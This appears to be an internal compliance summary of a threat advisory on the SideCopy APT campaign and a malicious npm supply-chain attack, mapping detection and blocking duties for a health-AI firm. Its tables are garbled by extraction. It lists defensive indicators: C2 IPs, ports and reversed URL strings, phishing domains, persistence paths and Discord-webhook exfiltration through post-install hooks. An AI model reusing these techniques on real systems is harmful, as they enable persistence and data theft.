REPORT
Document Title: DSCI THREAT INTELLIGENCE AND RESEARCH INITIATIVE THREAT ADVISORY
Prepared by: Aditya Kumar
Date: 12/07/2025
Index:
Serial Number
1.
2.
Topic
Document Overview
Key Requirements and
Guidelines
Page number
2
3-13
Document Overview
Field
Details
Title
DSCI THREAT INTELLIGENCE AND RESEARCH INITIATIVE THREAT ADVISORY
Publisher/Source
A Joint Whitepaper by CSIRT-Fin, CERT-In, and Mastercard
Year of Publication NA
Type
Cyber Threat Intelligence / Malware Campaign Report
Purpose
To document and analyze a targeted cyber-espionage campaign conducted by
SideCopy APT and a separate npm-based supply chain attack, both of which
threaten national security, critical infrastructure, and health-related organizations.
This report details a widespread, evolving cyber-espionage campaign led by the
Pakistan-linked SideCopy APT group, targeting critical Indian government
departments, defense institutions, energy sectors, and now extending to healthfocused entities such as the Ministry of External Affairs (MEA)—posing serious
concern for NirveonX, which operates in the AI-health domain.
Summary
Key infection vectors include spear-phishing emails, spoofed government websites
(notably mimicking e-Governance portals), and stealth payloads embedded in HTA,
MSI, and LNK files. The group uses custom Remote Access Trojans (CurlBack, Spark,
and Xeno RAT), enabling persistent access on both Windows and Linux systems
through advanced evasion, fileless execution, and encryption techniques.
Additionally, a supply chain attack was discovered involving 60 malicious npm
packages that exfiltrate host/network metadata to Discord-based C2 servers,
potentially compromising CI/CD environments and developer systems.
These operations collectively highlight a multi-pronged targeting strategy, posing
risks of data exfiltration, identity compromise, and lateral movement. Health-sector
organizations like NirveonX must act urgently to mitigate exposure to these attack
vectors through strict dependency audits, phishing resistance, and robust endpoint
monitoring.
Key Requirements or Guidelines
Pdf page 2-5/30
Type
(Recommended/Mandatory)
Item
Description
Initial Access Vector
Monitoring
Monitor for abuse of MSI installers and HTML
Application files, as these are used in modern Mandatory
APT attacks.
DLL Side-loading
Detection
Implement detection of DLL side-loading
techniques in internal and third-party
software execution.
Remote Access Tool
(RAT) Controls
Block or alert on unauthorized remote access
tools like MeshAgent, especially across Linux Mandatory
environments.
Spoofed Identity
Protection
Enforce anti-spoofing mechanisms (SPF,
DKIM, DMARC) and validate external email
senders claiming authority.
Mandatory
Malicious Domain
Blocking
Actively block and monitor fake egovernance and city municipal-themed
domains.
Mandatory
Open Directory
Scanning
Identify and block domains with suspicious
open directories that could be used to host
malware.
Recommended
Website Reputation
Management
Prevent loading content from compromised
legitimate sites (e.g., NHP portal), and use
threat intel to monitor for abuse.
Recommended
Honeytrap
Awareness Training
Conduct employee awareness training on
honeytrap-style social engineering, especially Recommended
for sensitive roles.
Spear-Phishing
Simulations
Regularly test phishing resilience via
simulations targeting execs or healthcare/AI
researchers.
Decoy Document
Detection
Use sandboxing and deep inspection tools to
detect malicious document payloads
Mandatory
masquerading as healthcare policies.
Mandatory
Mandatory
Item
Description
Type
(Recommended/Mandatory)
Platform-Specific
Payload Awareness
Implement multi-platform (Windows/Linux)
threat detection systems.
Mandatory
Impersonation of
Government
Domains
Monitor for domains/email IDs mimicking
.gov.in/.nic.in structures, as seen in NDC
phishing.
Mandatory
NirveonX duty:
Legally Written in
This PDF? (Yes/No)
Action
Why It’s Required
Monitor MSI and HTA execution
logs
SideCopy now uses MSI over HTA for
stealthier delivery—must detect these initial Yes
vectors
Implement EDR/XDR with DLL
injection detection
DLL side-loading is part of the attack chain;
EDRs should monitor memory and reflective Yes
loads
Block MeshAgent and similar
RMM tools
These tools are repurposed in Linux-based
targeted attacks
Yes
Apply email anti-spoofing
standards (SPF, DKIM, DMARC)
Spoofed email identities are used to gain
trust
Yes
Subscribe to threat intel feeds
listing malicious domains
To track phishing pages mimicking civic or
gov infrastructure
Yes
Periodically scan for open
directories in 3rd-party
dependencies
Attackers exploit open directories for
payload delivery
No (Implied)
Integrate sandbox detonation for Decoy PDFs and ZIP payloads are used—
received documents
sandboxing will reveal them
Yes
Build alert rules for gov-like
domains in email headers
Prevent confusion from domains like
@outlook[.]com vs @nic.in
Yes
Include honeytrap scenarios in
internal red team exercises
SideCopy reuses social engineering tactics
like honeytraps
Yes
Educate AI researchers and
developers on phishing lures
Especially if working with sensitive
health/defense data
Yes
Action
Why It’s Required
Legally Written in
This PDF? (Yes/No)
Deploy Linux-specific malware
detection tools
MeshAgent and RC4/AES loaders are now
Linux-compatible
Yes
Strengthen perimeter controls
around government-affiliated
themes
E.g., PDFs mimicking defense/health sector
Yes
policy updates
Pdf page 6-11/30
Item
Description
Type
(Recommended/Mandatory)
Phishing Domain
Detection
Actively detect and block access to spoofed
municipal portals, especially on
.egoservice[.]in or similar TLDs.
Mandatory
Public Service
Train staff on phishing lures mimicking RTS
Mimicry Awareness Act portals and city corporation sites.
Mandatory
Monitor domains registered under suspicious
Infrastructure Origin
ASN blocks (e.g., AS 140641 - YOTTA
Recommended
Analysis
NETWORK) linked with abuse.
Document-Based
Payload Detection
Scan PDF/ZIP/DOCX attachments (e.g., fake
Pharmaceutical Catalogues) for embedded
executables.
Mandatory
RAT Detection –
CurlBack, Spark
Signature or behavior-based detection for
CurlBack, Spark, and related malware on
Windows/Linux.
Mandatory
Dual-OS Threat
Protection
Maintain visibility and defense across both
Linux and Windows endpoints.
Mandatory
HTA Script Execution Block or sandbox .hta files from
Blocking
unknown/untrusted sources.
Mandatory
Monitor abnormal persistence methods: Run
Registry & Task
keys, scheduled tasks with fake service names Mandatory
Schedule Monitoring
like "OneDrive".
Anti-VM Evasion
Behavior Detection
CurlBack uses anti-VM checks before
executing—flag suspicious system behavior
attempting this.
Recommended
Item
Description
Type
(Recommended/Mandatory)
USB Enumeration
Recon Defense
Monitor and alert if malware scans USB
registries (USBSTOR), a behavior seen in
espionage tools.
Recommended
SideCopy monitors common processes to
Process Monitoring
hide—alert if a process manipulates
for Malware Evasion
explorer.exe, Defender, etc.
Recommended
Block or alert access to URLs like
Spoofed Gov/Health
nhp.mowr.gov.in if verified to be
Domain Alerts
abused/malicious clones.
Mandatory
NirveonX duty:
Legally Written in
This PDF?
(Yes/No)
Action
Why It’s Required
Block access to all .egoservice[.]in subdomains
and URLs
These are confirmed phishing
hosts mimicking municipal
Yes
RTS portals
Add YOTTA ASNs to suspicious infrastructure
watchlists
Domains used for phishing
are registered under AS
140641, likely controlled
infrastructure
Deploy sandbox/AV rules for pharma-themed
documents
“Pharmaceutical Product
Catalogue 2025” contains
Yes
malware and targets healthlinked sectors
Integrate signatures and behavior detection for
CurlBack and Spark
SideCopy’s latest campaign
uses these RATs across OS
platforms
Yes
Audit HTA file execution across all endpoints
HTA scripts are used to
establish persistence (e.g.,
svnides.hta)
Yes
Monitor registry Run keys and scheduled tasks
(e.g., OneDrive)
CurlBack maintains
persistence through these
methods
Yes
Yes
Action
Why It’s Required
Legally Written in
This PDF?
(Yes/No)
Flag binaries named similarly to legitimate tools
(e.g., CameraSettingsUIHost.exe)
Malware masquerades with
misleading filenames to
evade detection
Yes
Enable monitoring of anti-VM behavior
CurlBack checks for
sandbox/VM before
executing, indicative of
targeted APT behavior
Yes
Log registry path access to
SYSTEM\\ControlSet001\\Enum\\USBSTOR
Used by CurlBack for host
reconnaissance, valuable in
insider threat campaigns
Yes
Prevent document download from suspicious
clones of gov.in sites
E.g., nhp.mowr.gov.in URL
used for serving decoy
security PDFs with malware
Yes
Campaign collects USB
device metadata, potentially
Harden USB access controls on employee devices
Recommended
targeting removable data
transfers
Regular phishing simulations involving fake
RTS/municipal portals
To prepare staff against local
governance-themed phishing Recommended
attempts
Pdf page 12-19/30:
Item
Description
Type
(Recommended/Mandatory)
UUID-based Client
Registration Detection
Monitor for unknown UUID creation in
hidden directories (e.g., .client_id.txt in
user folders).
Mandatory
Detect C2 traffic patterns using reversed
Reversed URL C2 Pattern
endpoint strings (/retsiger/, /taebtraeh/, Mandatory
Monitoring
etc.).
ELF and Windows
Payload Dropping
Detection
Monitor download and execution of ELF
or Windows binaries from unknown PDF Mandatory
archives.
Item
Description
Type
(Recommended/Mandatory)
Crontab Persistence
(Linux)
Detect unusual entries in /dev/shm/ or
/etc/crontab pointing to suspicious
binaries.
Mandatory
Base64 & Caesar
Obfuscation Detection
Include decoding routines for Caesarciphered and base64-obfuscated
resources in behavioral analysis.
Mandatory
PDF-EXE Polyglot
Detection
Scan for dual-nature files where an
executable is hidden after the PDF’s
%%EOF marker.
Mandatory
HTA Stager Blocking
Detect or block .hta files embedding
base64 .NET payloads launched by
mshta.exe.
Mandatory
Registry Key-Based
Persistence Detection
Monitor abnormal Run key entries (e.g.,
Edgre, OneDrive) pointing to nonstandard binaries.
Mandatory
Memory-Only .NET
Assembly Execution
Detection
Implement memory scanning to detect
.NET payloads decoded and executed in
memory.
Mandatory
PowerShell
ExecutionPolicy Bypass
Detection
Monitor for -ExecutionPolicy Bypass and Mandatory
NoProfile usage by suspicious scripts.
Decryption via AES-CBC
with base64 IV
Flag and sandbox decryption routines
using base64-encoded keys and AES CBC Recommended
with PKCS7 padding.
Detect features like keylogging, SOCKS5
RAT Behavior Monitoring proxying, or UAC bypass (Xeno RAT
behaviors).
Mandatory
Domain Registration
Surveillance
Track infrastructure with known
suspicious registrars (GoDaddy,
Hostinger, NameCheap, Internet BS
Corp).
Cloudflare ASN Watch
Monitor abuse of ASN 13335 (Cloudflare)
Recommended
for proxying C2 operations.
Recommended
Type
(Recommended/Mandatory)
Item
Description
Open RDP Port Alerting
Alert on RDP ports (e.g., 56777) being
exposed to the internet, which was seen Mandatory
in C2.
NirvronX duty:
Action
Why It’s Required
Legally Written in
This PDF? (Yes/No)
Detect creation of .client_id.txt UUID files
Indicates registration with
SideCopy-style C2
Yes
Write YARA rules for reversed C2 strings (e.g.,
/retsiger/)
These patterns are hardcoded
and used in command
Yes
exchange
Scan PDFs for embedded EXEs after %%EOF
Used to hide and extract
executables from document
decoys
Yes
Enable behavior-based analysis for crontab
tasks in /dev/shm/
Linux persistence vector for
stealthy execution
Yes
Block .hta file launches by mshta.exe unless
signed/trusted
HTA stagers are still used and
remain FUD (Fully
Undetectable)
Yes
Detect suspicious Run key entries like Edgre,
OneDrive
Used to persist payloads
across reboots
Yes
Sandbox PowerShell commands with ExecutionPolicy Bypass
PowerShell is abused for
stealthy payload
decryption/execution
Yes
Integrate behavior signatures for .NET inmemory execution
SideCopy injects decoded .NET
Yes
DLLs directly into memory
Detect Caesar cipher obfuscation in scripts and Used to obscure payloads and
Yes
dropped files
avoid static detection
C2 traffic observed using these
Flag outbound connections to ports 1256 and
ports (RDP and custom RAT
Yes
56777
port)
Legally Written in
This PDF? (Yes/No)
Action
Why It’s Required
Block communication to recent C2 domains
(e.g., updates.widgetservicecenter[.]com)
Domains resolved to
Cloudflare/HZ Hosting used in Yes
campaign
Scan for specific filenames like DevApp.exe,
suport.exe
Associated with Xeno RAT’s
final payload
Yes
Map and monitor ASN abuse patterns (AS
13335, AS 202015)
Infrastructure pattern shows
centralized C2 planning
Yes
Ensure .pdb debug artifacts don’t trigger
signed binary trust
.pdb-named files used to
Yes
distribute malware in disguise
Conduct red team simulations of hybrid
Windows/Linux infection chains
SideCopy targets both OSes
using tailored delivery chains
Recommended
Pdf page 20-28/30
Type
Why It's Critical
for NirveonX
Mandatory
Enables early
detection of
known payloads
and loaders.
Mandatory
These are used
for initial access
and
masquerade as
harmless files.
Mandatory
HTA is used for
stealthy stagers
and memoryloaded .NET
payloads.
Mandatory
Known
payloads
including Xeno
RAT and loaders
BroaderAspect. Detect unusual .dll drops in ProgramData/LavaSoft
Mandatory
dll, DUI70.dll
paths
SideCopy drops
malicious DLLs
Component
Detection/Monitoring Required
SEQRITE AV
Signatures
Ensure endpoint protection has updated
detections for: HTA.SideCopy.*, Trojan.Fmq,
SideCopy.Mal.*, LNK.*, etc.
.lnk Files
.hta Files
Block suspicious .lnk files (e.g., renamed PDFs or
schedule documents)
Block or alert on .hta execution, especially via
mshta.exe
suport.exe,
DevApp.exe,
Monitor for hashes and suspicious executables
ConsoleApp1.ex listed
e
Component
Detection/Monitoring Required
Type
Why It's Critical
for NirveonX
for reflective
loading
Suspicious
Registry Keys
.zip Archive
Inspection
Watch for Run keys named Edgre, OneDrive, or
unknown keys in
Mandatory
HKCU\Software\Microsoft\Windows\CurrentVersi
on\Run
Used for
persistence by
SideCopy
Detect archives containing dual-nature files
(PDF+EXE)
ZIPs like NDC65UpdatedSchedule.zip
contain multiplatform
payloads
Mandatory
SideCopy uses
these to
Ceasar Cipher & Add decoding logic for Caesar (shift 9) and base64 Recommend
obfuscate
Base64
payload decoding
ed
payloads before
decryption
Post-EOF PDF
Scanning
Detect EXE binaries appended after %%EOF in
PDFs
.client_id.txt
File
Monitor hidden home directory files named
.client_id.txt
Xeno RAT C2
Behavior
Watch for connection to 79.141.161.58:1256 and
registration strings (/retsiger/, /sdnammoc/)
`.NET Memory
Execution**
Monitor .NET assembly execution from memory
(e.g., BroaderAspect.dll)
Crontab Abuse
Detect entries like /dev/shm/mycron
in Linux
Mandatory
Malware hides
executable
payloads after
legitimate PDF
content
Mandatory
Indicates
successful
registration
with C2 server
Mandatory
This is the C2 of
the final
payload RAT
Mandatory
Avoids touching
disk; requires
behavioral
detection
Mandatory
Persistence
vector for Linux
variants
Component
Detection/Monitoring Required
Malicious
Domains &
URLs
Block domains and URLs including:
egovservice[.]in, modspaceinterior[.]com,
updates.widgetservicecenter[.]com, etc.
npm PostInstall Script
Detection
Flag packages using suspicious post-install hooks
(discord webhook exfiltration)
Type
Why It's Critical
for NirveonX
Mandatory
Known
phishing/malwa
re
infrastructure
Mandatory
Part of stealth
npm supply
chain attack
targeting CI/CD
Indicates high
SandboxDetect logic in scripts trying to evade honeypots or Recommend sophistication;
Evasion Scripts VMs
ed
targets real
environments
Audit for npm
Packages
Continuously scan packages via tools like
Socket.dev CLI/GitHub App
Network Recon Detect JavaScript collecting host info (IP, DNS,
from JS
hostname, path) and sending to external URLs
Discord
Webhooks
CI/CD Pipeline
Audit
Block domains and traffic to known Discord
webhook endpoints from developer systems
Check pipelines for unverified dependencies and
use dependency pinning with hash checks
Mandatory
60+ malicious
npm packages
were used for
system-level
recon
Mandatory
Used in stealth
npm malware
for internal
mapping of
network assets
Mandatory
Exfiltration
vector from
compromised
npm modules
Mandatory
Attackers are
targeting build
systems to
implant future
backdoors
NirveonX duty:
Action Item
Justification
Status
Re-audit npm dependencies and remove any with Protects against the stealth npm attack
Pending
post-install scripts or unexplained URLs
targeting dev environments
Block domains/IPs listed in SideCopy IOC table
Prevents active C2 communication
Pending
Deploy YARA rules for reversed C2 paths and
Caesar-shift obfuscation
Improves behavioral malware detection Pending
Monitor PDF files with appended EXEs after
%%EOF marker
Core obfuscation used in Xeno RAT
delivery
Pending
Scan all systems for hashes provided (EXEs, DLLs, Enables identification of infections postPending
ZIPs)
compromise
Secure CI/CD pipeline: hash pinning, npm audit
enforcement, webhook monitoring
Prevents future npm-based data
exfiltration and malware staging
--The End--
Pending